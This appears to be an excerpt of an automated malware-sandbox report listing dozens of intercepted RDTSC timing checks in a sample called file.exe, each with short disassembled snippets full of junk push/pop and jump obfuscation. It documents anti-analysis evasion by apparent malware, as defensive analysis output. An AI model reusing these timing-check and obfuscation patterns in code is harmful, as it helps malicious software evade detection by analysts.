                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4BCE second address: AA4BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4CD3 second address: AA4CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5002 second address: AA5032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F2EE4744186h 0x00000010 pushad 0x00000011 ja 00007F2EE4744176h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5032 second address: AA505C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F2EE4767548h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA505C second address: AA5062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5062 second address: AA5075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE476753Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA69F1 second address: AA69F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA69F5 second address: AA6A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F2EE4767536h 0x0000000d jg 00007F2EE4767536h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A11 second address: AA6A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A15 second address: AA6A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140013 second address: 5140048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, 668073B7h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F2EE474417Dh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2EE474417Dh 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140048 second address: 5140068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2EE4767542h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120EF8 second address: 5120F33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2EE4744186h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2EE474417Eh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120F33 second address: 5120F6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2EE4767541h 0x00000009 jmp 00007F2EE476753Bh 0x0000000e popfd 0x0000000f mov bx, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2EE4767541h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120F6E second address: 5120F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov dx, 3EBEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ebx, 07C2CF04h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120F85 second address: 5120F89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51000FC second address: 5100138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 61381834h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F2EE4744184h 0x00000012 mov bx, si 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2EE4744183h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100138 second address: 510017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2EE4767542h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2EE476753Dh 0x00000017 or esi, 3451BD66h 0x0000001d jmp 00007F2EE4767541h 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510020F second address: 5100215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100215 second address: 5100246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767543h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2EE4767545h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D1F second address: 5120D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D23 second address: 5120D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D27 second address: 5120D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D2D second address: 5120D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D33 second address: 5120D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D37 second address: 5120D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2EE476753Ch 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D50 second address: 5120D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D56 second address: 5120D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120D71 second address: 5120D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120883 second address: 51208C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e mov dh, 49h 0x00000010 pop esi 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, cx 0x0000001b pushfd 0x0000001c jmp 00007F2EE4767542h 0x00000021 and ax, 8CD8h 0x00000026 jmp 00007F2EE476753Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51208C3 second address: 5120911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2EE474417Fh 0x00000009 adc ch, FFFFFF9Eh 0x0000000c jmp 00007F2EE4744189h 0x00000011 popfd 0x00000012 mov bl, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2EE4744186h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120911 second address: 5120916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120916 second address: 512091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512091C second address: 5120944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a push ebx 0x0000000b mov ebx, ecx 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2EE4767546h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120766 second address: 51207F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2EE4744180h 0x00000009 or eax, 7360F9D8h 0x0000000f jmp 00007F2EE474417Bh 0x00000014 popfd 0x00000015 mov ecx, 7B64788Fh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F2EE4744180h 0x00000025 add si, 4438h 0x0000002a jmp 00007F2EE474417Bh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F2EE4744188h 0x00000036 or ch, FFFFFF98h 0x00000039 jmp 00007F2EE474417Bh 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F2EE4744184h 0x00000048 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51207F8 second address: 512080A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE476753Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512080A second address: 512080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203F8 second address: 51203FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203FC second address: 5120402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120402 second address: 512044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 pushfd 0x00000006 jmp 00007F2EE4767547h 0x0000000b or al, FFFFFFFEh 0x0000000e jmp 00007F2EE4767549h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2EE476753Dh 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512044F second address: 51204D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F2EE474417Ah 0x00000010 mov edx, eax 0x00000012 pop ecx 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F2EE4744186h 0x0000001e add si, 14B8h 0x00000023 jmp 00007F2EE474417Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F2EE4744188h 0x0000002f jmp 00007F2EE4744185h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204D0 second address: 51204D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204D6 second address: 512052F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744183h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F2EE474417Bh 0x00000016 and cl, 0000003Eh 0x00000019 jmp 00007F2EE4744189h 0x0000001e popfd 0x0000001f call 00007F2EE4744180h 0x00000024 pop esi 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512052F second address: 5120535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51302FD second address: 5130310 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130310 second address: 5130316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130316 second address: 513031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170040 second address: 5170044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170044 second address: 5170048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170048 second address: 517004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517004E second address: 5170064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE4744182h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170064 second address: 51700C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F2EE476753Dh 0x00000010 sbb si, ADF6h 0x00000015 jmp 00007F2EE4767541h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F2EE4767540h 0x00000021 and ch, 00000018h 0x00000024 jmp 00007F2EE476753Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push ebx 0x00000031 pop ecx 0x00000032 mov bx, 0092h 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514037A second address: 5140380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140380 second address: 5140454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F2EE476753Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push esi 0x00000015 push ebx 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pushfd 0x00000019 jmp 00007F2EE4767546h 0x0000001e and eax, 6479C948h 0x00000024 jmp 00007F2EE476753Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, dword ptr [ebp+08h] 0x0000002e pushad 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F2EE4767542h 0x00000036 xor ecx, 4C338BA8h 0x0000003c jmp 00007F2EE476753Bh 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F2EE4767548h 0x00000048 xor esi, 213DFE08h 0x0000004e jmp 00007F2EE476753Bh 0x00000053 popfd 0x00000054 popad 0x00000055 mov di, cx 0x00000058 popad 0x00000059 and dword ptr [eax], 00000000h 0x0000005c jmp 00007F2EE4767542h 0x00000061 and dword ptr [eax+04h], 00000000h 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F2EE476753Ah 0x0000006e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140454 second address: 5140463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140463 second address: 5140469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140469 second address: 514046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514046D second address: 5140484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140484 second address: 514048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514048A second address: 514048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514048F second address: 5140494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120710 second address: 5120716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120716 second address: 5120737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744184h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop esi 0x0000000f mov esi, edi 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130F21 second address: 5130F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2EE4767543h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130F56 second address: 5130F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5130F73 second address: 5130F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE476753Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51401B0 second address: 51401B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516079C second address: 5160806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2EE4767541h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F2EE4767543h 0x00000019 adc ecx, 72D1F6BEh 0x0000001f jmp 00007F2EE4767549h 0x00000024 popfd 0x00000025 mov ch, 34h 0x00000027 popad 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5160806 second address: 516080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516080C second address: 5160810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5160810 second address: 5160820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5160820 second address: 5160824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5160824 second address: 516082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516082A second address: 5160830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5160830 second address: 5160834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5160834 second address: 5160853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F2EE476753Ah 0x0000000e push eax 0x0000000f pushad 0x00000010 movsx edx, ax 0x00000013 push eax 0x00000014 push edx 0x00000015 mov eax, 4623E5CFh 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5160A86 second address: 5160A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110133 second address: 5110143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE476753Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110143 second address: 511017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F2EE4744189h 0x00000012 or cl, FFFFFFF6h 0x00000015 jmp 00007F2EE4744181h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511017F second address: 51101BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 call 00007F2EE4767546h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F2EE4767541h 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101BB second address: 51101BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101BF second address: 51101D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101D2 second address: 51101D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101D8 second address: 51101DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101DC second address: 51101E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
